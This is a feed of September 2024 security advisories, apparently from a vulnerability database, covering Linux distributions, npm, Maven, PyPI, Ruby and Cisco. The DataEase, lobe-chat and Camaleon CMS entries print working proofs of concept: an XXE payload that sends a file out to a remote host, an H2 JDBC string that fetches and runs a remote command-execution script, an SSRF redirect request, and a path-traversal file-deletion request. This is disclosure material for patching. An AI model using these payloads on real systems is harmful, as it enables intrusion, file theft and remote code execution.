23.09.2024 23:30:12	npm	[NPM:GHSA-3FC8-2R3F-8WRG] lobe-chat implemented an insufficient fix for GHSA-mxhq-xw3g-rphc (CVE-2024-32964) (critical)	### SummarySSRF protection implemented in https://github.com/lobehub/lobe-chat/blob/main/src/app/api/proxy/route.ts does not consider redirect and could be bypassed when attacker provides external malicious url which redirects to internal resources like private network or loopback address.### PoC1. Run lobe-chat in docker container. In my setup lobe-chat runs on 0.0.0.0:3210;2. Create file dummy-server.js with the following content:```var http = require('http');console.log("running server");http.createServer(function (req, res) { console.log(req.url); res.writeHead(200, {'Content-Type': 'text/html'}); res.end();}).listen(3001, 'localhost');```And run ```node dummy-server.js```as an example server inside of container [1] (or in containers private network).3. Run in terminal to perform request to lobe-chat instance from [1]```curl --path-as-is -i -s -k -X $'POST' \ -H $'Host: 0.0.0.0:3210' -H $'Accept-Encoding: gzip, deflate, br' -H $'Referer: http://0.0.0.0:3210/settings/agent?agent=&session=inbox&tab=' -H $'Content-Type: text/plain;charset=UTF-8' -H $'Content-Length: 74' -H $'Origin: http://0.0.0.0:3210' -H $'Connection: keep-alive' -H $'Priority: u=0' \ -b $'LOBE_LOCALE=en-EN; LOBE_THEME_PRIMARY_COLOR=undefined; LOBE_THEME_NEUTRAL_COLOR=undefined' \ --data-binary $'http://130.193.49.129:8090/redirect?url=http://localhost:3001/iamssrf_1337' \ $'http://0.0.0.0:3210/api/proxy'```where body contains url of server which redirects to internal network (in my case it redirects according url parameter).4. Observe in output of [2]```running server/iamssrf_1337```5. Attacker is able to perform SSRF attacks against lobe-chat despite https://github.com/lobehub/lobe-chat/blob/main/src/app/api/proxy/route.ts#L26 check.### Fix recommendations:1. Disable redirects - lobe-chat should consider explicitly disable redirects. 2. If redirects support is required, perform check before each http request.### Impacthttps://portswigger.net/web-security/ssrf	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3FC8-2R3F-8WRG
23.09.2024 23:27:25	maven	[MAVEN:GHSA-4M9P-7XG6-F4MM] DataEase has an XML External Entity Reference vulnerability (high)	### ImpactThere is an XML external entity injection vulnerability in the static resource upload interface of DataEase. An attacker can construct a payload to implement intranet detection and file reading.1. send request:```POST /de2api/staticResource/upload/1 HTTP/1.1Host: dataease.ubuntu20.vmContent-Length: 348Accept: application/json, text/plain, /out_auth_platform: defaultX-DE-TOKEN: jwtUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6OZBNygiUCAZEbMn------WebKitFormBoundary6OZBNygiUCAZEbMnContent-Disposition: form-data; name="file"; filename="1.svg"Content-Type: a<?xml version='1.0'?> <!DOCTYPE xxe [ <!ENTITY % EvilDTD SYSTEM 'http://10.168.174.1:8000/1.dtd'> %EvilDTD; %LoadOOBEnt; %OOB; ]>------WebKitFormBoundary6OZBNygiUCAZEbMn--// 1.dtd的内容<!ENTITY % resource SYSTEM "file:///etc/alpine-release"> <!ENTITY % LoadOOBEnt "<!ENTITY % OOB SYSTEM 'http://10.168.174.1:8000/?content=%resource;'>">```2. After sending the request, the content of the file /etc/alpine-release is successfully read```::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /1.dtd HTTP/1.1" 200 -::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /?content=3.20.0 HTTP/1.1" 200 -```Affected versions: <= 2.10.0### PatchesThe vulnerability has been fixed in v2.10.1.### WorkaroundsIt is recommended to upgrade the version to v2.10.1.### ReferencesIf you have any questions or comments about this advisory:Open an issue in https://github.com/dataease/dataeaseEmail us at [wei@fit2cloud.com](mailto:wei@fit2cloud.com)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4M9P-7XG6-F4MM
23.09.2024 23:27:12	maven	[MAVEN:GHSA-H7MJ-M72H-QM8W] DataEase's H2 datasource has a remote command execution risk (critical)	### ImpactAn attacker can achieve remote command execution by adding a carefully constructed h2 data source connection string.request message:```POST /de2api/datasource/validate HTTP/1.1Host: dataease.ubuntu20.vmUser-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflateAccept: /Connection: closeX-DE-TOKEN: jwtContent-Length: 209Content-Type: application/json{ "id": "", "name": "test", "type": "h2", "configuration": "eyJqZGJjIjogImpkYmM6aDI6bWVtOnRlc3Q7VFJBQ0VfTEVWRUxfU1lTVEVNX09VVD0zO0lOSVQ9UlVOU0NSSVBUIEZST00gJ2h0dHA6Ly8xMC4xNjguMTc0LjE6ODAwMC9wb2Muc3FsJzsifQ=="}```h2 data source connection string:```// configuration{ "jdbc": "jdbc:h2:mem:test;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '[http://10.168.174.1:8000/poc.sql'](http://10.168.174.1:8000/poc.sql%27);",}```the content of poc.sql:```// poc.sqlCREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "su18";}';CALL EXEC ('touch /tmp/jdbch2rce')```You can see that the file was created successfully in docker:```/tmp # ls -l jdbch2rce -rw-r--r-- 1 root root 0 Sep 16 22:02 jdbch2rce```Affected versions: <= 2.10.0### PatchesThe vulnerability has been fixed in v2.10.1.### WorkaroundsIt is recommended to upgrade the version to v2.10.1.### ReferencesIf you have any questions or comments about this advisory:Open an issue in https://github.com/dataease/dataeaseEmail us at [wei@fit2cloud.com](mailto:wei@fit2cloud.com)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-H7MJ-M72H-QM8W
23.09.2024 20:02:44	ubuntu	[USN-7021-2] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7021-2
23.09.2024 19:18:42	ubuntu	[USN-7029-1] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7029-1
23.09.2024 18:52:38	ubuntu	[USN-7007-3] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7007-3
23.09.2024 18:33:39	ubuntu	[USN-6999-2] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6999-2
23.09.2024 17:33:23	suse	[SUSE-SU-2024:3405-1] Security update for the Linux Kernel (Live Patch 6 for SLE 15 SP5) (important)	Security update for the Linux Kernel (Live Patch 6 for SLE 15 SP5)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3405-1
23.09.2024 16:56:03	suse	[SUSE-SU-2024:3404-1] Security update for rage-encryption (moderate)	Security update for rage-encryption	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3404-1
23.09.2024 16:55:21	suse	[SUSE-SU-2024:3403-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3403-1
23.09.2024 16:33:33	suse	[SUSE-SU-2024:3399-1] Security update for the Linux Kernel (Live Patch 23 for SLE 15 SP4) (important)	Security update for the Linux Kernel (Live Patch 23 for SLE 15 SP4)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3399-1
23.09.2024 16:04:42	suse	[SUSE-SU-2024:3398-1] Security update for the Linux Kernel (Live Patch 2 for SLE 15 SP6) (important)	Security update for the Linux Kernel (Live Patch 2 for SLE 15 SP6)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3398-1
23.09.2024 15:04:11	suse	[SUSE-SU-2024:3396-1] Security update for qemu (important)	Security update for qemu	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3396-1
23.09.2024 14:33:26	suse	[SUSE-SU-2024:3395-1] Security update for the Linux Kernel (Live Patch 20 for SLE 15 SP4) (important)	Security update for the Linux Kernel (Live Patch 20 for SLE 15 SP4)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3395-1
23.09.2024 13:54:26	ubuntu	[USN-7028-1] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7028-1
23.09.2024 13:23:53	ubuntu	[USN-7020-2] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7020-2
24.09.2024 05:55:36	rubysec	[RUBYSEC:WEBRICK-2024-47220] HTTP Request Smuggling in ruby webrick (high)	An issue was discovered in the WEBrick toolkit through 1.8.1 for Ruby.It allows HTTP request smuggling by providing both a Content-Lengthheader and a Transfer-Encoding header, e.g.,"GET /admin HTTP/1.1\r\n" inside of a "POST /user HTTP/1.1\r\n"request.NOTE: the supplier''s position is "Webrick should not be used in production."	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:WEBRICK-2024-47220
23.09.2024 21:51:29	rubysec	[RUBYSEC:CAMALEON_CMS-7X4W-CJ9R-H4V9] Camaleon CMS vulnerable to remote code execution through code injection (GHSL-2024-185) (high)	The [actions](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L51-L52)defined inside of the MediaController class do not check whether agiven path is inside a certain path (e.g. inside the media folder).If an attacker performed an account takeover of an administratoraccount (See: GHSL-2024-184) they could delete arbitrary files orfolders on the server hosting Camaleon CMS. The[crop_url](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L64-L65)action might make arbitrary file writes (similar impact to GHSL-2024-182)for any authenticated user possible, but it doesn't seem to work currently.Arbitrary file deletion can be exploited with following code path:The parameter folder flows from the actions method:```ruby def actions authorize! :manage, :media if params[:media_action] != 'crop_url' params[:folder] = params[:folder].gsub('//', '/') if params[:folder].present? case params[:media_action] [..] when 'del_file' cama_uploader.delete_file(params[:folder].gsub('//', '/')) render plain: ''```into the method delete_file of the CamaleonCmsLocalUploaderclass (when files are uploaded locally):```rubydef delete_file(key) file = File.join(@root_folder, key) FileUtils.rm(file) if File.exist? file @instance.hooks_run('after_delete', key) get_media_collection.find_by_key(key).take.destroyend```Where it is joined in an unchecked manner with the root folder andthen deleted.Proof of conceptThe following request would delete the file README.md in the topfolder of the Ruby on Rails application. (The values for auth_token,X-CSRF-Token and _cms_session would also need to be replaced withauthenticated values in the curl command below)```curl --path-as-is -i -s -k -X $'POST' \ -H $'X-CSRF-Token: [..]' -H $'User-Agent: Mozilla/5.0' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Accept: /' -H $'Connection: keep-alive' \ -b $'auth_token=[..]; _cms_session=[..]' \ --data-binary $'versions=&thumb_size=&formats=&media_formats=&dimension=&private=&folder=..2F..2F..2FREADME.md&media_action=del_file' \ $'https://<camaleon-host>/admin/media/actions?actions=true'```ImpactThis issue may lead to a defective CMS or system.RemediationNormalize all file paths constructed from untrusted user inputbefore using them and check that the resulting path is inside thetargeted directory. Additionally, do not allow character sequencessuch as .. in untrusted input that is used to build paths.See also:[CodeQL: Uncontrolled data used in path expression](https://codeql.github.com/codeql-query-help/ruby/rb-path-injection/)[OWASP: Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:CAMALEON_CMS-7X4W-CJ9R-H4V9
23.09.2024 21:51:29	rubysec	[RUBYSEC:CAMALEON_CMS-R9CR-QMFW-PMRC] Camaleon CMS vulnerable to stored XSS through user file upload (GHSL-2024-184) (medium)	A stored cross-site scripting has been found in the image uploadfunctionality that can be used by normal registered users:It is possible to upload a SVG image containing JavaScript andit's also possible to upload a HTML document when the formatparameter is manually changed to [documents][1] or a string of an[unsupported format][2]. If an authenticated user or administratorvisits that uploaded image or document malicious JavaScript can beexecuted on their behalf(e.g. changing or deleting content inside of the CMS.)[1]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L105-L106[2]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L110-L111## ImpactThis issue may lead to account takeover due to reflectedCross-site scripting (XSS).## RemediationOnly allow the upload of safe files such as PNG, TXT and othersor serve all "unsafe" files such as SVG and other files with acontent-disposition: attachment header, which should preventbrowsers from displaying them.Additionally, a [Content security policy (CSP)][3]can be created that disallows inlined script. (Other parts of theapplication might need modification to continue functioning.)[3]: https://web.dev/articles/cspTo prevent the theft of the auth_token it could be marked withHttpOnly. This would however not prevent that actions could beperformed as the authenticated user/administrator. Furthermore,it could make sense to use the authentication provided byRuby on Rails, so that stolen tokens cannot be used anymoreafter some time.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:CAMALEON_CMS-R9CR-QMFW-PMRC
24.09.2024 00:22:09	pypi	[PYSEC-2024-87] micropython-copy vulnerability	A vulnerability was found in MicroPython 1.23.0. It has been rated as critical. Affected by this issue is the function mpz_as_bytes of the file py/objint.c. The manipulation leads to heap-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The patch is identified as 908ab1ceca15ee6fd0ef82ca4cba770a3ec41894. It is recommended to apply a patch to fix this issue. In micropython objint component, converting zero from int to bytes leads to heap buffer-overflow-write at mpz_as_bytes.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-87
24.09.2024 00:22:09	pypi	[PYSEC-2024-88] micropython-io vulnerability	A vulnerability was found in MicroPython 1.23.0. It has been rated as critical. Affected by this issue is the function mpz_as_bytes of the file py/objint.c. The manipulation leads to heap-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The patch is identified as 908ab1ceca15ee6fd0ef82ca4cba770a3ec41894. It is recommended to apply a patch to fix this issue. In micropython objint component, converting zero from int to bytes leads to heap buffer-overflow-write at mpz_as_bytes.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-88
24.09.2024 00:22:09	pypi	[PYSEC-2024-89] micropython-os vulnerability	A vulnerability was found in MicroPython 1.23.0. It has been rated as critical. Affected by this issue is the function mpz_as_bytes of the file py/objint.c. The manipulation leads to heap-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The patch is identified as 908ab1ceca15ee6fd0ef82ca4cba770a3ec41894. It is recommended to apply a patch to fix this issue. In micropython objint component, converting zero from int to bytes leads to heap buffer-overflow-write at mpz_as_bytes.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-89
25.09.2024 11:27:37	ubuntu	[USN-7009-2] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7009-2
25.09.2024 04:16:33	ubuntu	[USN-7033-1] Intel Microcode vulnerabilities	Several security issues were fixed in Intel Microcode.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7033-1
24.09.2024 23:19:41	ubuntu	[USN-7032-1] Tomcat vulnerability	Tomcat could allow unintended access to network services.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7032-1
24.09.2024 21:34:44	maven	[MAVEN:GHSA-2RMJ-MQ67-H97G] Spring Framework DoS via conditional HTTP request (moderate)	### DescriptionApplications that parse ETags from `If-Match` or `If-None-Match` request headers are vulnerable to DoS attack.### Affected Spring Products and Versionsorg.springframework:spring-web in versions 6.1.0 through 6.1.116.0.0 through 6.0.225.3.0 through 5.3.37Older, unsupported versions are also affected### MitigationUsers of affected versions should upgrade to the corresponding fixed version.6.1.x -> 6.1.126.0.x -> 6.0.235.3.x -> 5.3.38No other mitigation steps are necessary.Users of older, unsupported versions could enforce a size limit on `If-Match` and `If-None-Match` headers, e.g. through a Filter.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2RMJ-MQ67-H97G
24.09.2024 19:46:51	suse	[SUSE-SU-2024:3430-1] Security update for python36 (important)	Security update for python36	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3430-1
24.09.2024 19:46:34	suse	[SUSE-SU-2024:3429-1] Security update for apr (moderate)	Security update for apr	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3429-1
24.09.2024 19:46:17	suse	[SUSE-SU-2024:3428-1] Security update for apr (moderate)	Security update for apr	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3428-1
24.09.2024 19:42:50	suse	[SUSE-SU-2024:3427-1] Security update for python311 (important)	Security update for python311	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3427-1
24.09.2024 19:42:36	suse	[SUSE-SU-2024:3426-1] Security update for quagga (important)	Security update for quagga	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3426-1
24.09.2024 19:33:32	suse	[SUSE-SU-2024:3425-1] Security update for the Linux Kernel (Live Patch 18 for SLE 15 SP4) (important)	Security update for the Linux Kernel (Live Patch 18 for SLE 15 SP4)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3425-1
24.09.2024 18:25:51	suse	[SUSE-SU-2024:3424-1] Security update for xen (moderate)	Security update for xen	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3424-1
24.09.2024 18:25:42	suse	[SUSE-SU-2024:3423-1] Security update for xen (important)	Security update for xen	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3423-1
24.09.2024 18:25:24	suse	[SUSE-SU-2024:3422-1] Security update for xen (moderate)	Security update for xen	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3422-1
24.09.2024 18:25:08	suse	[SUSE-SU-2024:3421-1] Security update for xen (moderate)	Security update for xen	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3421-1
24.09.2024 18:04:39	ubuntu	[USN-7031-2] Puma vulnerability	Puma could be made to overwrite headers if it received specially craftednetwork traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7031-2
24.09.2024 16:38:59	suse	[SUSE-SU-2024:3418-1] Security update for python311 (important)	Security update for python311	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3418-1
24.09.2024 16:16:23	ubuntu	[USN-7031-1] Puma vulnerability	Puma could be made to overwrite headers if it received specially craftednetwork traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7031-1
24.09.2024 13:46:00	xen	[XSA-462] x86: Deadlock in vlapic_error()	ISSUE DESCRIPTIONIn x86's APIC (Advanced Programmable Interrupt Controller) architecture,error conditions are reported in a status register. Furthermore, the OScan opt to receive an interrupt when a new error occurs.It is possible to configure the error interrupt with an illegal vector,which generates an error when an error interrupt is raised.This case causes Xen to recurse through vlapic_error(). The recursionitself is bounded; errors accumulate in the the status register and onlygenerate an interrupt when a new status bit becomes set.However, the lock protecting this state in Xen will try to be takenrecursively, and deadlock.IMPACTA buggy or malicious HVM or PVH guest can deadlock Xen, leading to aDoS.VULNERABLE SYSTEMSXen 4.5 and onwards are vulnerable. Xen 4.4 and older are not vulnerable.Only x86 systems running HVM or PVH guests are vulnerable.Architectures other than x86 are not vulnerable.Only HVM or PVH guests can leverage the vulnerability. PV guests cannotleverage the vulnerability.	https://secdb.nttzen.cloud/security-advisory/xen/XSA-462
25.09.2024 09:23:55	pypi	[PYSEC-2024-91] micropython-copy vulnerability	A vulnerability was found in MicroPython 1.23.0. It has been classified as critical. Affected is the function mp_vfs_umount of the file extmod/vfs.c of the component VFS Unmount Handler. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 29943546343c92334e8518695a11fc0e2ceea68b. It is recommended to apply a patch to fix this issue. In the VFS unmount process, the comparison between the mounted path string and the unmount requested string is based solely on the length of the unmount string, which can lead to a heap buffer overflow read.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-91
25.09.2024 09:23:55	pypi	[PYSEC-2024-92] micropython-copy vulnerability	A vulnerability was found in MicroPython 1.22.2. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file py/objarray.c. The manipulation leads to use after free. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. Upgrading to version 1.23.0 is able to address this issue. The identifier of the patch is 4bed614e707c0644c06e117f848fa12605c711cd. It is recommended to upgrade the affected component. In micropython objarray component, when a bytes object is resized and copied into itself, it may reference memory that has already been freed.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-92
25.09.2024 09:23:55	pypi	[PYSEC-2024-93] micropython-io vulnerability	A vulnerability was found in MicroPython 1.23.0. It has been classified as critical. Affected is the function mp_vfs_umount of the file extmod/vfs.c of the component VFS Unmount Handler. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 29943546343c92334e8518695a11fc0e2ceea68b. It is recommended to apply a patch to fix this issue. In the VFS unmount process, the comparison between the mounted path string and the unmount requested string is based solely on the length of the unmount string, which can lead to a heap buffer overflow read.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-93
25.09.2024 09:23:55	pypi	[PYSEC-2024-94] micropython-io vulnerability	A vulnerability was found in MicroPython 1.22.2. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file py/objarray.c. The manipulation leads to use after free. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. Upgrading to version 1.23.0 is able to address this issue. The identifier of the patch is 4bed614e707c0644c06e117f848fa12605c711cd. It is recommended to upgrade the affected component. In micropython objarray component, when a bytes object is resized and copied into itself, it may reference memory that has already been freed.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-94
25.09.2024 09:23:56	pypi	[PYSEC-2024-95] micropython-os-path vulnerability	A vulnerability was found in MicroPython 1.23.0. It has been classified as critical. Affected is the function mp_vfs_umount of the file extmod/vfs.c of the component VFS Unmount Handler. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 29943546343c92334e8518695a11fc0e2ceea68b. It is recommended to apply a patch to fix this issue. In the VFS unmount process, the comparison between the mounted path string and the unmount requested string is based solely on the length of the unmount string, which can lead to a heap buffer overflow read.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-95
25.09.2024 09:23:56	pypi	[PYSEC-2024-96] micropython-string vulnerability	A vulnerability was found in MicroPython 1.23.0. It has been classified as critical. Affected is the function mp_vfs_umount of the file extmod/vfs.c of the component VFS Unmount Handler. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 29943546343c92334e8518695a11fc0e2ceea68b. It is recommended to apply a patch to fix this issue. In the VFS unmount process, the comparison between the mounted path string and the unmount requested string is based solely on the length of the unmount string, which can lead to a heap buffer overflow read.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-96
26.09.2024 12:55:30	ubuntu	[USN-7003-4] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7003-4
26.09.2024 12:53:22	ubuntu	[USN-7034-2] ca-certificates update	The CA certificates in the ca-certificates package were updated.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7034-2
26.09.2024 12:09:02	ubuntu	[USN-7038-1] APR vulnerability	The system could be made to expose sensitive information.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7038-1
26.09.2024 09:38:27	ubuntu	[USN-7037-1] OpenJPEG vulnerability	OpenJPEG could be made to crash if it opened a specially crafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7037-1
26.09.2024 07:19:46	ubuntu	[USN-7036-1] Rack vulnerabilities	Several security issues were fixed in Rack.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7036-1
26.09.2024 03:19:01	fedora	[FEDORA-2024-6b9aeecbe8] Fedora 41: chisel (high)	Update to new upstream version (closes rhbz#2303131)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-6b9aeecbe8
26.09.2024 01:21:37	ubuntu	[USN-7035-1] AppArmor vulnerability	AppArmor restrictions could be bypassed for rules allowing mountoperations	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7035-1
26.09.2024 01:13:22	npm	[NPM:GHSA-VRCX-GX3G-J3H8] Heap-based Buffer Overflow in sqlite-vec (critical)	sqlite-vec v0.1.1 was discovered to contain a heap buffer overflow via the npy_token_next function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted file.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VRCX-GX3G-J3H8
25.09.2024 21:13:36	npm	[NPM:GHSA-RGG8-G5X8-WR9V] Cross-site scripting (XSS) in the clipboard package (moderate)	### ImpactDuring a recent internal audit, a Cross-Site Scripting (XSS) vulnerability was identified in the CKEditor 5 clipboard package. This vulnerability could be triggered by a specific user action, leading to unauthorized JavaScript code execution, if the attacker managed to insert a malicious content into the editor, which might happen with a very specific editor configuration.This vulnerability affects only installations where the editor configuration meets the following criteria:1. The [Block Toolbar](https://ckeditor.com/docs/ckeditor5/latest/getting-started/setup/toolbar.html#block-toolbar) plugin is enabled.1. One of the following plugins is also enabled: - [General HTML Support](https://ckeditor.com/docs/ckeditor5/latest/features/html/general-html-support.html) with a configuration that permits unsafe markup. - [HTML Embed](https://ckeditor.com/docs/ckeditor5/latest/features/html/html-embed.html).### PatchesThe problem has been recognized and patched. The fix will be available in version 43.1.1.### WorkaroundsIt's highly recommended to update to the version 43.1.1. However, if the update is not an option, we recommend disabling the block toolbar plugin.### For more informationEmail us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RGG8-G5X8-WR9V
25.09.2024 19:32:15	ubuntu	[USN-7034-1] ca-certificates update	The CA certificates in the ca-certificates package were updated.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7034-1
25.09.2024 19:11:35	suse	[SUSE-SU-2024:3445-1] Security update for opensc (low)	Security update for opensc	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3445-1
25.09.2024 19:11:12	suse	[SUSE-SU-2024:3444-1] Security update for opensc (low)	Security update for opensc	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3444-1
25.09.2024 19:11:01	suse	[SUSE-SU-2024:3443-1] Security update for opensc (low)	Security update for opensc	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3443-1
25.09.2024 19:00:00	cisco	[CISCO-SA-WEBUI-CSRF-YCUYXKKO] Cisco IOS XE Software Web UI Cross-Site Request Forgery Vulnerability (high)	A vulnerability in the web-based management interface of Cisco IOS XE Software could allow an unauthenticated, remote attacker to perform a cross-site request forgery (CSRF) attack and execute commands on the CLI of an affected device.This vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading an already authenticated user to follow a crafted link. A successful exploit could allow the attacker to perform arbitrary actions on the affected device with the privileges of the targeted user.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the September 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75169"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-WEBUI-CSRF-YCUYXKKO
25.09.2024 19:00:00	cisco	[CISCO-SA-VLAN-DOS-27PUR5RT] Cisco Catalyst 9000 Series Switches Denial of Service Vulnerability (medium)	A vulnerability in Cisco IOS XE Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on the control plane of an affected device.This vulnerability is due to improper handling of frames with VLAN tag information. An attacker could exploit this vulnerability by sending crafted frames to an affected device. A successful exploit could allow the attacker to render the control plane of the affected device unresponsive. The device would not be accessible through the console or CLI, and it would not respond to ping requests, SNMP requests, or requests from other control plane protocols. Traffic that is traversing the device through the data plane is not affected. A reload of the device is required to restore control plane services.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the September 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75169"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-VLAN-DOS-27PUR5RT
25.09.2024 19:00:00	cisco	[CISCO-SA-UTD-SNORT3-DOS-BYPAS-B4OUEWXD] Cisco Unified Threat Defense Snort Intrusion Prevention System Engine for Cisco IOS XE Software Security Policy Bypass and Denial of Service Vulnerability (medium)	A vulnerability in Cisco Unified Threat Defense (UTD) Snort Intrusion Prevention System (IPS) Engine for Cisco IOS XE Software could allow an unauthenticated, remote attacker to bypass configured security policies or cause a denial of service (DoS) condition on an affected device.This vulnerability is due to insufficient validation of HTTP requests when they are processed by Cisco UTD Snort IPS Engine. An attacker could exploit this vulnerability by sending a crafted HTTP request through an affected device. A successful exploit could allow the attacker to trigger a reload of the Snort process. If the action in case of Cisco UTD Snort IPS Engine failure is set to the default, fail-open, successful exploitation of this vulnerability could allow the attacker to bypass configured security policies. If the action in case of Cisco UTD Snort IPS Engine failure is set to fail-close, successful exploitation of this vulnerability could cause traffic that is configured to be inspected by Cisco UTD Snort IPS Engine to be dropped.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	